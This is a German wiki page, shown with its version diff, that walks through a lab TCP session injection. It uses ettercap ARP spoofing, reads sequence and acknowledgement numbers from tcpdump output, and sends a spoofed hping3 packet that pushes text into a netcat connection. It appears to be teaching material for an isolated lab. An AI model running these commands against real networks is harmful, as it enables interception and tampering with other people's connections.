Packet Injection: Unterschied zwischen den Versionen
(Die Seite wurde neu angelegt: „=Vorraussetzung= *Arpspoofing mit Ettercap =Versuchsaufbau= *CLIENT=10.0.10.103 *OPFER=10.0.10.104 *ANGREIFER=10.0.10.101 *DSTPORT=2020 {{#drawio:hacking-1…“) |
|||
| (2 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
| + | =Überlegung= | ||
| + | *Wir wollen über Arpspoofing eine Verbindung kontrollieren | ||
| + | *Danach wollen wir den 3 Wege Handshake mitschneiden | ||
| + | *Wir ermitteln daraus die Sequenz, Acknowledge Nummer sowie den Source Port | ||
| + | *Mit diesen Daten wollen wir von unserem Angreifer aus, Daten in die Verbindung injizieren. | ||
| + | |||
=Vorraussetzung= | =Vorraussetzung= | ||
*[[Arpspoofing mit Ettercap]] | *[[Arpspoofing mit Ettercap]] | ||
| Zeile 26: | Zeile 32: | ||
*DSTPORT=2020 | *DSTPORT=2020 | ||
;TCPDUMP | ;TCPDUMP | ||
| − | *tcpdump -ni eth0 -S host | + | *tcpdump -ni eth0 -S host $OPFER and tcp |
;Wir suchen SEQ, ACK und SRCPORT | ;Wir suchen SEQ, ACK und SRCPORT | ||
Aktuelle Version vom 15. Juli 2021, 13:50 Uhr
Überlegung
- Wir wollen über Arpspoofing eine Verbindung kontrollieren
- Danach wollen wir den 3 Wege Handshake mitschneiden
- Wir ermitteln daraus die Sequenz, Acknowledge Nummer sowie den Source Port
- Mit diesen Daten wollen wir von unserem Angreifer aus, Daten in die Verbindung injizieren.
Vorraussetzung
Versuchsaufbau
- CLIENT=10.0.10.103
- OPFER=10.0.10.104
- ANGREIFER=10.0.10.101
- DSTPORT=2020
Angreifer
- Auf Angreifer brauchen wir 2 Terminals
Terminal 1
- Variablen setzen
- CLIENT=10.0.10.103
- OPFER=10.0.10.104
- ANGREIFER=10.0.10.101
- DSTPORT=2020
- Arp Spoofing
- ettercap -Tq -i eth0 -M arp /$CLIENT,$OPFER// /$OPFER,$CLIENT//
Terminal 2
- Variablen setzen
- CLIENT=10.0.10.103
- OPFER=10.0.10.104
- ANGREIFER=10.0.10.101
- DSTPORT=2020
- TCPDUMP
- tcpdump -ni eth0 -S host $OPFER and tcp
- Wir suchen SEQ, ACK und SRCPORT
OPFER
- nc -lp 2020
CLIENT
- nc 10.0.10.104 2020
ANGREIFER
TERMINAL 2
- tcpdump -ni eth0 -S host 10.0.10.104 and tcp
- tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
15:32:57.007020 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [S], seq 1196642424, win 64240, options [mss 1460,sackOK,TS val 783051844 ecr 0,nop,wscale 7], length 0
15:32:57.014293 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [S], seq 1196642424, win 64240, options [mss 1460,sackOK,TS val 783051844 ecr 0,nop,wscale 7], length 0
15:32:57.014686 IP 10.0.10.104.2020 > 10.0.10.103.53730: Flags [S.], seq 3707523260, ack 1196642425, win 28960, options [mss 1460,sackOK,TS val 1977650 ecr 783051844,nop,wscale 7], length 0
15:32:57.022274 IP 10.0.10.104.2020 > 10.0.10.103.53730: Flags [S.], seq 3707523260, ack 1196642425, win 28960, options [mss 1460,sackOK,TS val 1977650 ecr 783051844,nop,wscale 7], length 0
15:32:57.022652 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [.], ack 3707523261, win 502, options [nop,nop,TS val 783051859 ecr 1977650], length 0
15:32:57.030231 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [.], ack 3707523261, win 502, options [nop,nop,TS val 783051859 ecr 1977650], length 0
- Wir brechen ab mit CTRL-C
- Weitere Variablen setzen
- SEQ=1196642425
- ACK=3707523261
- SRCPORT=53730
Payload generieren
- echo "hallo tux" > data.dat
hping3 injection bauen
- Kommando kontrollieren
- echo hping3 -a $CLIENT -s $SRCPORT -p $DSTPORT -A -d 10 -E data.dat -c 1 -M $SEQ -L $ACK $OPFER
- Kommando abschicken
- hping3 -a $CLIENT -s $SRCPORT -p $DSTPORT -A -d 10 -E data.dat -c 1 -M $SEQ -L $ACK $OPFER
OPFER
- nc -lp 2020
hallo tux
